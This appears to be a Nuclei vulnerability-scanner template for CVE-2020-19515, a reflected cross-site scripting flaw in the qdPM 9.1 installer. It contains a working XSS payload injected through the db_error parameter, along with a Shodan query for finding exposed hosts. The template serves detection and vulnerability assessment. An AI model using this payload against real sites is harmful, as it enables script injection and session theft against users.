nuclei-templates/http/cves/2020/CVE-2020-19515.yaml

55 lines
1.8 KiB
YAML

id: CVE-2020-19515
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
reference:
- https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2020-19515
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-19515
cwe-id: CWE-79
epss-score: 0.00102
epss-percentile: 0.41242
cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: qdpm
product: qdpm
shodan-query: http.favicon.hash:762074255
tags: cve2020,cve,xss,qdpm,unauth
http:
- method: GET
path:
- "{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain) />'
- 'qdPM'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a0046304402205447757079347b8070e89fe60975aa83c5f776a495770b9fe12acf27f046e0030220569d1f8e17b6d601ebb193264cb7fab1e1dea5fdb12a553bd34fd8f502786c21:922c64590222798bb761d5b6d8e72950